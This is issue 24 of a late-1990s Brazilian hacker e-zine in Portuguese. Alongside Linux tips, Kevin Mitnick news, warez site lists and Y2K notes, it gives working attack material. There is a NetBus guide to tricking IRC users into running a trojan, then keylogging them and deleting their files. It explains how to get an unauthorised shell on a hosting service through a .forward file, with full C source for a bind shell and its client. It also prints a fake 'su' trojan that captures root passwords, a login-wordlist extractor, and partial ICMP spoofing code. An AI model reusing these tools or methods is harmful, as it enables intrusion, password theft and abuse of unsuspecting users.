Cszine 24
zZZZZZZZZZZZZZZZZZZz
zZ
zZ
cCCCCc sSSSSs zZ ii n NN eEEEe
cCC CCc sSS SSs zZ II Nn NN eEE EEe
cCC CC sSS SS zZ NNn NN eEE EE
cCCC CC SSSs S zZ ii NNNn NN eEEE E
CCCC C SSSs zZ II NNNNn NN EEEE
CCCC SSSs zZ II NN NNn NN EEEEEEEe
CCCC SSSs zZ II NN NNn NN EEEEEEEe
CCCC c SSSs zZ II NN NNn NN EEEE
CCCC cC s SSSs zZ II NN NNnNN EEEE e
CCC CC Ss sSS zZ II NN NNNN EEe eE
CCc cCC SSs sSS zZ II NN NNN EEe eEE
CCCCCC SSSSSS zZ II NN NN EEEEE
zZ
zZ
zZZZZZZZZZZZZZZZZZZz
Numbah 24
~~~~~~ ~~
¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯
* E-Mail da revista : cszine@hotmail.com
* Memoserv de Struck : /msg memoserv send Struck <msg>
(Soh no irc.via-rs.com.br)
* Page da revista : http://members.xoom.com/cszine
InTrOdUcIoN..
A pedido de um amigo meu, que logo se tornara' editor da zine, eu vou parar um pouco de colocar tanto sobre o Kevin m. . Concordo que jah enjoou.
A seçao sera' dedicada a historis de outros hackers, tanto brasileros quanto extrangeiros. Se voce tiver a historia ai, mande para mim que eu a publicarei aqui.. Tipo.. pra proxima edicao eu jah preparei uma historia nacional, mas depois eu nao tenho mais nada.
Como eu nao consigo viver na chatice e monoteice, mudei novamente os graficos ascii da zine. Nao mudei o logon porque nao me surgiu ideias, mas na proxima edicao estara' bala.
"Informacao nao e crime...crime e usa-la como um lamer..."Oluparun
Indice
Secao: Assunto: Autor:
1. Linux Configurando seu Linux Cheat Struck
2. Kevin Mitnick NOTICIAS DE MITNICK Fernanda S.
3. Warez Pirataria Eletronica Cheat Struck
4. VIRII Virus de Boot Cheat Struck
5. Bugz Bug do milenio Cheat Struck
6. Programaçao Alguns progs interessantes Cheat Struck
7. Win Attack NetBus ZeFuReNgA
8. Invasao de privacidade Hackeando a XOOM Cheat Struck
9. Hack, the Art Moore Tips Hackz Cheat Struck
10. °°°BoNuS!!! Truques com cartas Cheat Struck
Quem escreveu nessa edicao???
Cheat Struck <cszine@hotmail.com>
Fernanda Serpa <fserpa@rubi.netmarket.com.br>
ZeFuReNgA <furenga@hotmail.com>
1. Linux
Configurando seu Linux
Pois eh..
Conheci muitas pessoas que jah instalaram o linux mas nao sabem configura-lo e nem usa-lo para conectar a internet.
Pois eh. Essa materia e' em homenagem a voce que me enviou o email pedindo que abrisse essa secao. Se tiver mais uma duvida mande outro email q eu colocarei a resposta aqui okz..
***** Inicializaçao ********
Durante a instalacao do linux ele perguntara onde sera' dado o LILO BOOT. Se voce estiver usando dois sistemas operacionais no computador eu recomendo fazer com que o LILO BOOT seja feito em um disquete.
Insira entao um disquete, e nomeie-o como LILO BOOT.
Inicie o computador com o disquete no drive. Apos a msg "LILO BOOT:", tecle TAB para ver as alternativas. Entao digite o nome que foi dado a particao do Linux. O default do RH e' "dos" pro windows e "linux" pro linux. No SlackWare nao tenho certeza mas acho que e' "win" pro windows e "linux" pro linux.
A primeira inicializaçao pode demorar um pouco. Agora na entrada digite seu login e senha. Se voce nao se lembrar da senha colocada durante a instalacao. De reset e no "LILO BOOT:" digite "linux single".
Quando voce decidir parar de usar nao de apenas um reset. Digite : "reboot" (tem que ser o root). O linux se preparara' para rebootar. Assim na proxima inicializaçao ele nao levara tanto tempo. O meu entra em uns 10 seg.
***** Configurando acesso a internet *********
Voce vai precisar configurar varios arquivos para ter uma conexao segura com seu provedor.
Uma configuracao simples seria assim:
Edite o arquivo /etc/resolv.conf e adicione as seguintes linhas:
domain YYYYYYYY
nameserver XXX.XXX.XXX.XXX
Onde YYYYYYYY e' o dominio do provedor (tipo.. aquilo que vem depois do host que e' te dado). XXX.XXX.XXX.XXX e' o IP do DNS do provedor.
Ae voce entra no minicom com o comando 'minicom'. Use os comandos do modem para discar(ex: ATDP 0001122). Apos a conexao digite o username e a sua senha.
Tecle Ctrl+A segure por uns 7 segundos(no comeco e' foda, depois voce se acostuma), solte e tecle Z. Voce vai para um menu de opcoes. Tecle Q para sair e confirme.
De volta ao prompt, digite: pppd /dev/modem 38400 defaultroute
Prontu!! Voce estah conectado.
***** Configurando uma conexao segura *********
Na instalacao do linux jah vem configurado alguns servicos para serem usados em redes. Nao me lembro ao certo quais sao. Acho que dentre eles estao Telnet, FTP, SMTP, POP3, FINGER, NETSTAT, e outros...
Meu conselho e' reirar todos a nao ser que voce queira que um outro usuario use uma shell no seu sistema. Nao deixe qquer um entrar no seu sistema, pois se um bug ou uma permisao de um arquivo estiver errada possibilitando o usuario pegar contas e/ou root-shell. Se for seu amigo lhe avisara' dos problemas, se nao for..
Vamos ver como fazer isso entao...
* Desabilitando serviços:
- Edite o arquivo /etc/inetd.conf
- Procure pelas linhas que nao comecam com um #
- Essas linhas sao os servicos abilitados
- Para desabilitar basta colocar um # na frente da linha
* Definir usuarios que podem usar seu sistema:
- Edite o arquivo /etc/hosts.denny
- Insira a linha "all: all"
- Se quizer fazer com que os usuarios nao tenham acesso somente a telnet, insira a linha desse modo: "in.telnetd: all". E assim vale para todos os serviços.
- Agora voce deve dar acesso um a um.
- Primeiro descubra o IP do kra.
- Entao edite o /etc/hosts.allow e insira a seguinte linha:
all: XXX.XXX.XXX.XXX
Onde XXX.XXX.XXX.XXX e' o IP do usuario.
- Se quizer tipo abilitar somente o ftp insira a linha assim:
in.ftpd: XXX.XXX.XXX.XXX
***** Configurando inicializaçoes *******************
Ao adicionar um usuario com o 'adduser' ele criara' um diretorio home (/home/nome_do_user) onde conterao varios arquivos ocultos.
Os arquivos ocultos tem um .(ponto) na frente para nao serem detectados pelo ls. Porem atualmente os usuarios de Linux nao usam muito o ls sem nenhum subcomando. O mais usado e' ls -la onde listara os arquivos e pastas (tanto simples quanto ocultos) com suas propriedades.
Voltando aos arquivos criados pelo 'adduser'..
O arquivo .bash_history loga todos os comandos da ultima secao do usuario. Este e' criado pelo proprio usuario que pode simplesmente altera-lo.
O arquivo .bash_profile sao um conjunto de comandos para serem executados na entrada do usuario. Voce sendo o root pode usa-lo para mandar msgs para o usuario. Tipo.. colocar assim como conteudo:
echo "hehehehe!!"
echo "Voce nao fez por merecer essa shell."
echo "Good Bye"
exit
No arquivo .bash_logout coloque os comandos a serem executados quando o usuario sair.
Aqui eu soh falei dos arquivos para a shell bash por que e' a mais usada por usuarios tanto comuns como root's.
***************
E' soh isso por hoje.
Se alguma duvida ainda nao foi esclarecida mande emails com as perguntas que eu to pensando em fazer isso em forma de FAQ para ficar mais facil o entendimento da materia.
2. Kevin Mitnick
NOTICIAS DO MITNICK (por Fernanda Serpa)
10/1996
Support Kevin - Aproxima-se o dia do julgamento de Kevin Mitnick. As 25 novas acusacoes que pesam sobre Kevin poderao cair por terra ou nao, dia 29 de janeiro de l997. As ultimas informacoes sao de que Kevin esta estressado e desmotivado em virtude de mil retaliacoes que tem sofrido(ate'o banho diario foi cortado- so'de 3 em 3 dias ocasionando problemas dermatologicos e de efeito moral arrasador, e'claro).Mas... no's nao podemos deixar que continuem violando os direitos humanos e legais de Kevin Mitnick. Nao e'possivel que fiquemos quietos diante de tanto barulho assistindo a este julgamento injusto e imoral. Agora e'o momento de "entupir"o correio americano de milhares de cartas para M. Janet Reno.
Acesse o site www.netmarket.com.br/mitnick e participe da campanha. Envie quantas cartas puder e quiser. E'necessario que o Governo Americano entenda que o mundo todo esta assistindo a este julgamento e que nos nao vamos ficar de bracos cruzados esperando para ver quantos Kevin existirao depois deste Kevin. A campanha continua ate Kevin Mitnick ser posto em liberdade.
AJUDE KEVIN!
11/1996
Kevin foi para o confinamento solitario a uma da tarde de ontem sexta feira, dia 27. Ele estava na biblioteca estudando sua defesa quando o levaram para a solitaria dizendo que ele nao podia estar ali, etc... Bobagem.
Na verdade o que eles queriam era um pretexto para entrar na cela de Kevin e roubar-lhe todos os seus pertences para poderem avaliar sua linha de defesa e tambem para coagir-lhe novamente com a solitaria a abrir mao de seus direitos legais.
Isto e' um verdadeiro absurdo. Estou fazendo o que posso, contatando com algumas pessoas nos E.U.A para abrirem a boca no trombone junto a midia e fazer pressao oficial.
Por favor ajude divulgando a noticia para que estoure na midia o mais depressa possivel.
3. Warez
Pirataria Eletronica..
A pirataria em computadores tambem e' chamada de Warez no sub-mundo.
Eu nao me interesso muito nisso, porem existem muitas pessoas que passam o dia intiero colados nos canais #warez trocando programas. Na maioria das vezes os programas valem a pena.
Tenho que deixar claro que esta materia e' um resumo de varios dados encontrados na internet.
"Niguem pode deter o impulso humano de desafiar o proibido...
Tanto assim que o lema que orbita no espaco Warez e':
Se um homem faz, o outro desfaz.
Nao Existe impossivel."
CLINTON ASSINA PROJETO CONTRA PIRATARIA
Bill Clinton assinou no dia 21/12 um projeto de lei que torna contravencao a pirataria de materiais com termo de copyright na Internet. Os projetos impoe penas de 1 a 3 anos de prisao e multas de ate 250 mil dolares a qualquer pessoa condenada por copiar materiais via Internet assinados com direito de propriedade intelectual na Internet, como software, gravacoes, textos e filmagens.
O projeto e rejeitado pelas comunidades academicas e cientificas, que utilizam o livre fluxo de informacoes da Internet. Agora, o "No Electronic Theft Act" sera encaminhado ao Congresso dos EUA, que podera ou nao ratificar a lei.
Nomeclaturas
- Traders: sao os caras que trocam os programas a maioria das vezes pelo ICQ ou pelo IRC. Vc pode dar uma olhada em canais como: #warez, #warezwarez, #freewarez, entre outros.
- Coders: Sao os caras que manjam de programacao e estao sempre apoiando a galera do grupo.
- Crackers: Sao os encarregados de quebrar a proteçao dos programas. Eles desenvolvem sistemas para tirar travas, passwords, estes programas sao chamados de Crackers, e podem ser encontrados em varias paginas Hackers decentes como a a zine Axur05: "http://www.axur05.org"
- Supplier: O cara que fornece os programas para serem craqueados.
CD-R
CD's Recordables(Gravaveis) sao a principal forma de transporte de Warez. Porem com um Gravador de CD e' possivel ganhar um dinheiro ateh de quem nem tem computador.
Gravando CDs de musica vc pode ganhar um bom dinheiro com seus amigos Tipo o Corel CD Creator. Depois, escolha Audio CD, Velocidade 1x, e escolha as faixas q quer gravar (pode ser de qualquer CD de audio ou arquivos .WAV).
Bleza. Voce pode ganhar R$10 por CD's. Tipo.. Nas lojas de musica um CD sai uns R$15,00 e um CD-R que sai uns R$5,00 (Na Globo).
E voce ainda tera' a posibilidade de selecionar as musicas.
Lista de sites Warez
[P A S T] - http://pages.infinit.net/obsidian/index.htm
Dead End FTPZ - http://home.thezone.net/~cgriffit
Warez Ftp - http://www.warezftp.org/
(C)Warez - http://hem2.passagen.se/resto/cwarez
Elite Verified Sitez - http://209.75.36.214/
DaBoY's Warez - http://home.att.net/~xxdaboyxx
Warez Universe - http://www.pbtech.com/~warezuni/
Warez pathfinder - http://www.multimedia-edv.com/iis/warez.htm
WFA T3 WAREZ DIRECT - http://www.bright.net/~brandonr
WareZ GameZ DownloadZ - http://www4.torget.se/users/p/Pudeln/warez/warez.htm
Radio pirata (por Anderson ( Pirata & Corsário ) )
Um Transmissor de FM profissional é dividido em várias partes, cada item abaixo são circuitos que devem ser montados em compartimentos diferentes (caixas metálicas), para que a blindagem seja feita corretamente para o perfeito funcionamento e máximo rendimento do transmissor.
- Oscilador / Modulador
- Exitador de RF
- Módulo Amplificador Intermédiario de RF
- Módulo Amplificador Final de RF
- Medidor de Potência e Ondas Estacionárias
- Fonte de Alimentação do Oscilador
- Fonte de Alimentação do Exitador, Amplificador Intermédiario e Ampificador Final de RF
Atenção !!!
Esse equipamento exige do Técnico responsável pela montagem o minimo conhecimento da área de RF. Pois trata-se de um circuito extremamete complexo com muitas bobinas, placas e soldagens críticas. Esse transmissor foi todo desenvolvido por mim ao longo dos meus estudos nessa área. … bom que o montador saíba que esse tipo de transmissão é crime e pode dar até cadeia . Já passei por um sufoco desse e mesmo assim continuio transmitindo pois tenho sangue de Pirata nas veias !!!
4. VIRII
Virus de BOOT
Estou pra divulgar isso faz tempo(umas 2 edicoes). Soh que ae o Simon Phoenix entro naquelas de ser editor de outra secao e nao deu pra divulgar isso. Bem... nas proximas edicoes ele disse que mandaria mais coisas sobre virus. Esperamos que sim neh.
Na ediçao 22 eu publiquei um Anti-Virus para o Leandro&Kelly, mas nao deu tempo pra falar como funciona o virus.
Eu vou descrever aqui um breve historico dele e depois mostrar como ele se armazena na memoria.
*****************************************************************************
* Historico do virus Leandro&Kelly *
* *
* Origem : Minas Gerais *
* Autor : Governador Valadares *
* Captado : 05/10/94 *
* Encontrado : Boot de um Disco flexivel *
* Local : PAULÕNIA - SP (Empresa Comercial) *
* *
* Surgiu pela primeira vez, em outubro de 1994, causando grande panico*
* nacional. *
* Foi distribuido largamente em um disco original(ou seria pirata?) de*
* uma conceituada empresa multi-nacional. O virus alastrou-se de forma relam*
* pago. *
* Mesmo nao sendo um virus nocivo, ele pode ser fatal se combinado com*
* outro virus, o que pode acarretar a danificaçao de Setor BOOT MASTER do *
* disco rigido e a impossibilidade de acessa-lo. *
* *
*****************************************************************************
Compreenda os passos do seu computador ate' chegar no prompt...
~~~~~~~~~~ ~~ ~~~~~~ ~~ ~~~ ~~~~~~~~~~ ~~~~ ~~~~~~ ~~ ~~~~~~~~~
- O microprocessador executa o programa existente no endereço FFFF:0000, onde existe o programa CHIP BIOS (Fisico).
- O programa do BIOS apos os "checkups" costumeiros, vai ler e executar o conteudo no BOOT de disquete.
- O conteudo do BOOT do disquete (programa de BOOT) e' um programa de inici alizaçao e um bloco de parametros contendo Trilha, Setor por trilha, cluster, etc.. Nesta parte e' que o virus vai entrar, substituindo este programa.
- Sem virus: O programa do BOOT chamara os arquivos de sistema (IO.SYS,etc). Com virus: O virus vai chamar o conteudo original(O programa de BOOT).
O programa de Boot chamado pelo virus vai chamar os arquivos de Sistema (IO.SYS, etc). No caso de disco rigido, primeiro o BIOS chamara o BOOT MASTER que logo apos vai ler e largar o controle para o BOOT do DOS. Caso o virus entre no disco rigido, vai entao alocar no BOOT MASTER.
Agora entenda como ele se organiza na memoria...
~~~~~ ~~~~~~~ ~~~~ ~~~ ~~ ~~~~~~~~ ~~ ~~~~~~~~~~
0000:7C00 - Primeira parte do virus. Lido pela BIOS automaticamente.
0000:7E00 - Segunda parte do virus. Lido pelo virus durante a execucao como OVERLAY da trilha 27h Setor 9.
Em determinada parte(primeira do virus) ele se auto copia no topo da memoria basica, normalmente em 9F00:0000, ficando:
9F00:01FF - Primeira parte
9F00:0200 - Segunda parte
Apos copiar, ele salta para ele mesmo (seu clone), porem em outra area na memoria, de 0000:7C7D para 9F00:007E.
Agora saiba como esta o Disco Contaminado...
~~~~~ ~~~~~ ~~~~ ~~~~ ~ ~~~~~ ~~~~~~~~~~~~~~
Trilha 0, Setor 1, Lado 0 = Primeira Parte do virus.
E' onde deveria estar o boot. Saiba que a BIOS chamara' isto quando vc ligar o computador com o disco no drive, pensando encontrar o BOOT.
Trilha 27, Setor 8, Lado 1 = Segunda parte do virus.
Trilha 27, Setor 9, Lado 1 = Boot Original que deveria estar na Trilha 0, Setor 1, Lado 0.
"Um virus ferido e' perigoso como um animal ferido......."
FABIAN GRAZIA
(Presidente do G.I.S.V.I)
5. Bugz
Bug do milenio
Provavelmente este seja o bug que mais ficara' conhecido na historia.
Esse bug se encontra na BIOS de processadores antigos. O bug consiste no seguinte... As datas nas BIOS mais antigas eram mostradas assim:
12/04/98
Somente eram usados 2 caracteres para dia, mes e ano. Isso porque nos computadores antigos 4 caracteres ocupavam um significante espaco.
Porem quando fizeram isso, nao haviam pensado no seguinte: Assim que chegassemos no ano 2000 o ano seria confundido com 1900 por os dois possuir os 2 ultimos caracteres iguais.
E assim vai seguir: 2001 = 1901, 2002 = 1902,..
A pouco tempo ainda, veio um panaquinha ai que fez um programinha que somava algumas datas e dizia que havia descobreto o patch desse bug.
Atualmente, e' soh assim que pode ser o patch, porem assim que chegar em 2100 aconteceria a mesma merda.
O unico meio de concertar permamente esse bug e' atualizando o BIOS.
Para voce verificar se seu BIOS possui este bug. Faça o seginte...
- Reinicie o computador e assim que começar o checkup de memoria tecle DEL.
- Voce esta no Setup do BIOS. Entre no menu Standard CMOS Setup.
- Verifique os caracteres do ano. Se possuir 4 carcteres, o BIOS esta inume a esse bug, se tiver soh 2...
Se tiver 2 e voce nao quizer trocar o BIOS, va em..
http://www.rightime.com
http://www.nstl.com/html/ymark-2000.html
..e pegue os patches.
6. Programaçao
Alguns programas interesantes
Para a proxima edicao esta previsto um tutorial de C que um friend meu vai escrever. Enquanto nao chega aqui vai um programa nacional escrito por SkyLaz.
Esse programa le um arquivo de senhas e pega todos os logins colocando-os em lista para ser usado como wordlist. E' muito util, pois muitos usuarios usam o proprio login como senha.
Basta executa-lo que ele dara' a sintaxe de uso.
Foi mau, mas eu nao consegui o nome do arquivo.
----------------------------Corte Aki--(XXXXXXX.c)---------------------------
/*
Pessoal, como esse prog. ainda esta na versao 1.0, ele possue algumas
falhazinhas... Uma delas e que quando voce seleciona um arquivo passwd no
qual suas linhas de senhas sejam maiores que 70-90 caracteres, ou seja,
que oculpe mais de uma linha, ele vai interpretar como mais um login...
Em breve lancarei a versao 2.0 com essas falhas ja arrumadas :] ehehe e
de graca :]
fcerqueira@hotmail.com
*/
#include <stdio.h>
main(int argc, char *argv[2])
{
FILE *fp;
int i;
int count=0;
char letter[128];
if (argc == 1)
{
printf("\033[1;40;34mProgramado by \033[1;40;32mSkyLaZ\033[1;40;33marT(h)");
printf("\t\t\033[1;40;37m#Hacking CoMpOtEnTe\n");
printf("\033[5;40;36mVersion: 1.0\n");
printf("\033[0;40;37m");
printf("\033[1;40;35mSintaxe: %s <file> >> <usersdict>\n",argv[0]);
printf("\n");
printf("\033[1;40;31mOBS: Nao esqueca que p/ o perfeito funcionamento do prog
. e necessario que\nno passwd so contenha as senhas, ou seja, sem nenhum
comentario.\n\n");
printf("\033[0;40;37m");
exit(1);
}
if ((fp = fopen (argv[1], "r")) == NULL)
{
printf("Impossivel ler o arquivo especificado\n");
exit(1);
}
else
{
while (!feof(fp))
{
fscanf(fp, "%[^\n]\n", &letter);
for ( i = 0; i <= 15; ++i)
{
if ( letter[i] == ':')
i = 15;
else
printf("%c", letter[i]);
}
printf("\n");
}
fclose(fp);
}
}
-----------------------------------------------------------------------------
7. Win Attack
Primeiro eu gostaria de me desculpar com o [LuCiFeR].. A sua materia vai ter que ficar para a próxima edicao, pois o seu email chegou depois desse entao em consideracao, decidi publicar essa materia primeiro.
Mas nem te esquenta, pois na proxima edicao sai outra materia quente sobre esse programa que atualmente e' uma das maiores diversoes para tirar sarro com o outro kra.
Net Bus ( por ZeFuReNgA )
Antes de qq um falar algo pela primeira vez ele deve ser apresentar nao acham? :)
Bem... Meu codname é ZeFuReNgA membro da ICMP sekurity group tenho 14 anos e 2 anos nesse mundo muito interessante que é o mundo UNDERGROUND!
Caso voce quer me encontrar me procure :
E-Mail : furenga@linuxbr.com.br - rmaa@cruiser.com.br - furenga@hotmail.com
IRC : Brasirc - irc.artnet.com.br - #Hacker , #icmp
UIN : Nao vou dar pq tem babacas que aprenderam a usar icq flood ontem :)
Bem, chegando de blá blá ... Nesta matéria eu irei fazer um tutorial sobre o NET BUS. Nao... Nao... NET BUS nao é um Onibus na net (bah... heheh piada ridicula)
OBS : é um prazer escrever para a CSZ umas das zines que vem fazendo mais sucesso no brasil atualmente devido a vontade de fazer uma zine séria... que ja ultrapassou do numero 20 coisa que nunca vi em uma zine aqui no brasil
______________
Netbus é um programa para você controlar remotamente um computador ligado a internet que esteja rodando WINDOWS 95 / 98 / NT
Ele permite que você tenha total acesso ao outro computador.
Mas antes de você ja ir pensando em sair invadindo o computador do pessoal... Você vai ter uma dificil tarefa... jogar o patche.exe para o computador da vitima e fazelo (a) executalo.
Ai você pensa... O que esse patche.exe tem haver com isso tudo?
Bem... Este arquivo é um cavalo de troia que abrira no computador da vitima uma porta onde o cliente do NETBUS (netbus.exe) ira usar para a invasao. Ele usa o protocolo tcp/ip :)
Você já deve estar querendo saber o lugar onde se pega o netbus né? entao ok... eu sou bonzinho hehe... vá em http://www.warforge.com - Obs : não me mande e-mail falando que nao acho ele! Se vira que ele esta lá...
Agora que você ja deu o download descompacta ele para c:\netbus com o WINZIP , PKUNZIP ou qualquer dessas merdas ae... caso você nao tenha o winzip vai em www.winzip.com
Pronto... agora você ira precisar infectar alguem. Entre em qualquer servidor de irc. E procure conversar com uns lammers... diz que é um nuke foda ou um programa para hackear provedor ( putz hehehe ). Se vira e joga essa merda lá...
Ja jogo? Ele ja rodo? OPAAA!!! agora ta beleza... Agora rodeo o cliente do Netbus (netbus.exe) agora siga os passos :
Conectando ao computador :
Na parte " Host name / IP : " Bote o IP do cara... e Clique em Connect! Depois disso é só você fazer a festa... Você pode ficar abrindo e fechando o CD - ROM do cara, mandar uma caixa de dialogo , tirar uma foto do computador dele , dar download dos arquivos e tem no computador dele e dar upload , rodar aplicativos e mais muita coisa que eu vou descrever abaixo.
Já conectado ao computador da vitima voce pode fazer essas seguintes acıes...
Tudo isso feito por você!
- Abrir e fechar o CD - ROM
- Mostrar imagens
- Trocar as funcoes do mouse tipo o click no botao direito será como um click no esquerdo
- Tocar uma musica
- Comandar o mouse da vitima
- Desligar , Reiniciar o computador da vitima
- Ir para uma homepage (bota um site gay pra zoar o cara!)
- Gravar todas as teclas que ele esta digitando! (bom para você ler os pvts!)
- Tirar foto do micro do cara! (Yeah! isso mesmo! ACREDITE!)
- Upload de qualquer arquivo de voce e manda pra ele! (e rodar! bom para virus.. voce passa e roda ele :))
- Aumentar e diminuir o volume do som
- Fazer sons ao clicar no teclado
- Dar downloads e deletar qualquer coisa (deletar é coisa de babaca...)
- Travar certas teclas do teclado
- Botar senha no micro dele para que so voce possa usar o NETBUS nele
DICAS QUENTES PARA VOC USAR COM O NETBUS!!
Jogue para o computador do cara o boserve.exe (o virus do BO) e rodeo ele... ai você terá 2 opcoes de invadir o computador do lamer, por netbus ou por backorifice (show!)
Trave as vogais dele (a,e,i,o,u) voce nao tera ideia de como será engraçado ver ele falando sem as vogais... tipo "v t dr prrd!!!" = "vou te dar porrada!!!"
Abre qualquer cliente de IRC e digite /dns www.provedor.com.br . Ele returnara com um numero (ip) tipo 200.222.234.54. Copie esse ip e cole no Netbus e bote 200.222.234.54+100 . Clicke em connect! Ele irá scannear todos os ips de 200.222.234.0 a 200.222.234.100 (Se conectar em algum comemore :) ! )
_______________
Bem... Acho que ja ta bom o papo de hoje sobre netbus...
Espero ter te ajudado :) Boa invadidas... See you later!
E POR FAVOR!!! NAO ME VENHA ENCHER O SACO VIA E-MAIL OU IRC ME PERGUNTADO PERGUNTAS IDIOTAS OU IPS COM NETBUS! ABRA«OS A TODOS QUE LERAM A MINHA M¡TERIA...
"Pra quem fica a minha pica , pra quem vai a pica do meu pai e pra quem nao gosto a pica do meu avô!"
ZeFuReNgA
8. Invasao de privacidade
Hackeando a XOOM
Este metodo ainda nao foi descrito em nenhum outro lugar e pode parecer meio complicado de inicio, mas logo voce pega a manha.
O metodo descrito aqui e' para voce conseguir uma shell na xoom, coisa que eles nao dam no cadastro. Apos o cadastro na XOOM voce ganha acesso a ftp e smtp.
Entao faca o seguinte:
1. Entre por ftp no xoom.com
2. Digite sua senha e seu password
3. Envie o Hackshd (o codigo aparecera' aqui), jah compilado, para seu dir home.
4. Envie um arquivo de nome .forward com o seguinte conteudo.
chmod a+x hackshd
./hackshd
5. Desconectesse e Abra um telnet pela porta 25(smtp).
6. Mande um email pra si mesmo.
7. Prontu!!! O hackshd foi abriu uma shell na porta 6666 da xoom.
Este programa, foi produzido por Oluparum que jah escreveu para a Axur05. A meu respeito foi uma das melhores materias que sairam na Axur05.
Hm.. o programa tem algumas falhas, mas vc aprendera a usa-lo direitinho com o tempo. Para descubrir as falhas va em...
http://www.geocities.com/CollegePark/Campus/7154/
...e pegue a Axur05 numero 2.
PS1: A page da Axur05 continua inativa.
PS2: Tirei alguns comentarios do programa, mas o autor jah foi falado.
PS3: O Oluparum nao me deu permissao de mencionar seu programa nem seu nick. Nao consegui contata-lo.. Se vc estiver lendo isso mail-me okz??
--------------------------Corte Aki--(hackshd.c)-----------------------------
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define NUMPORT 6666 /* Numero do PORT atendido pelo server */
main()
{
int insock, conec, c;
struct sockaddr_in cli_addr, serv_addr;
conec = accept( insock, (struct sockaddr*) &cli_addr, &c);
insock = socket(AF_INET, SOCK_STREAM,0);
bzero( (char *) &serv_addr, sizeof(serv_addr) );
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(NUMPORT);
bind( insock, (struct sockaddr *) &serv_addr, sizeof(serv_addr) );
listen( insock, 1 );
c = sizeof( cli_addr );
conec = accept( insock, (struct sockaddr*) &cli_addr, &c);
dup2(conec,0);
dup2(conec,1);
dup2(conec,2);
execl("/bin/sh","sh", 0);
}
-----------------------------------------------------------------------------
Se voce tiver linux rode esse cliente para o hackshd na seguinte sintaxe: hackclient host.com.br <porta>
Lembresse que a porta padrao e' 6666.
--------------------------Corte Aki--(hackclient.c)--------------------------
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/socketvar.h>
#include <sys/errno.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#define PORT_SERVER 6666
extern int errno;
void emula (conec)
int conec;
{
char tecla[2], in[2];
int lidos = 0;
switch ( fork() ) {
case -1:
printf("\nErro no Fork");
return;
case 0:
while (1) {
if ( (lidos = read(conec, in, 1)) > 0 )
putchar(in[0]);
else {
if (lidos == 0)
return;
else {
printf("\nErro na gravacao");
return;
} }
}
default:
while (1) {
tecla[0] = getchar();
if ( (write( conec, tecla, 1)) == -1) {
perror("ERRO:");
printf("\nErro no write");
return;
}
}
}
}
int main( numarg, argv)
int numarg;
char **argv;
{
struct hostent *hp;
struct sockaddr_in sin;
short s, portnum = PORT_SERVER;
char host[80];
numarg--;
switch (numarg) {
case 2:
portnum = atoi(argv[2]);
case 1:
strcpy(host, argv[1]);
break;
default:
printf("Sintaxe: hacksh server_name <port>\n");
return(-1);
}
hp = gethostbyname( host );
if ( hp == 0 ) {
perror ( "hacksh: gethostbyname" );
exit ( 1 );
}
bzero ( &sin, sizeof ( sin ) );
bcopy ( hp->h_addr, &sin.sin_addr, hp->h_length );
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons( portnum );
s = socket ( AF_INET, SOCK_STREAM, 0 );
if ( s == -1 ) {
perror ( "hacksh: socket" );
exit ( 1 );
}
if ( connect ( s, (struct sockaddr *) &sin, sizeof ( sin ) ) == -1 ) {
perror ( "hacksh: connect" );
printf ( " - erro de connect status - %d ", errno );
exit ( 1 );
}
emula ( s );
close ( s );
return(0);
}
-----------------------------------------------------------------------------
Ambos programas devem ser compilados com: cc -o <prog> <prog.c>
9. Hack, the Art
Su Trojam
Esse trojam eu encontrei a pouco, porem jah deve ser bem conhecido da galera experiente.
Coloque-o num diretorio que esteja no path exatamente com 'su' e com permisão de execuçao para todos. Se ainda nao sabe como fazer isso..
$ echo $PATH
/bin:/sbin:/usr/bin:/usr/sbin:...
$ cp su /bin
$ chmod 755 /bin/su
-------------------------------Corte Aki--(su)-------------------------------
#include <stdio.h>
#include <stdlib.h>
#define SU_PASS "/tmp/.rewt"
main (int argc, char *argv[])
{
char *key;
char buf[24];
FILE *fd;
key = (char *)getpass ("Password:");
fd = fopen(SU_PASS,"w");
fprintf(fd, "pass: %s\n", key);
fclose(fd);
printf ("su: incorrect password\n");
sprintf(buf, "rm %s", argv[0]);
system(buf);
exit (1);
}
-----------------------------------------------------------------------------
Agora leia o arquivo /tmp/.rewt e lah encontrara' a senha do root.
Hacking Conex
A conex e' um provedor muito rulz as sextas e sabados de noite, pois durante a semana, ela nao suporta uma conexao por mais de 10 minutos.
Acontece que a conex e' um dos provedores mais fodas de hackear...
Os unicos servicos que prestam lah sao ftp, smtp, http.
Notou que ateh acesso a telnet eles tiraram???
Outros detalhes..O ftp anonymous foi cortado; mesmo voce entrando com o login/senha direitinho no ftp, nao consegue conexao(Login Error); Entre outros..Soh consegui mesmo usar o smtp da conex.
Agora eu nao me lembro qual o smtp que eles usam, mas vai ter que ser assim que teremos que explora-la.
Em algumas edicoes passadas, vcs encontraram uma lista de bugz para sendmail..
ICMP Packets spoof
Este programa pode estar meio desatualizado mas foi o unico que funcionou com sucesso..
Tentei simplifica-lo o maximo e tambem corrigi alguns erros mediocres que se encontravam nele. O autor do programa e' Rza (???).
-----------------------------Corte Aki--(bewm.c)-----------------------------
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/signal.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeof(struct iphdr) + 16)
#define ICMPSIZE (sizeof(struct icmphdr) + sizeof(struct iphdr) + 16)
#define offsetTCP (sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeof(struct iphdr))
#define offsetIP (sizeof(struct iphdr) + sizeof(struct icmphdr))
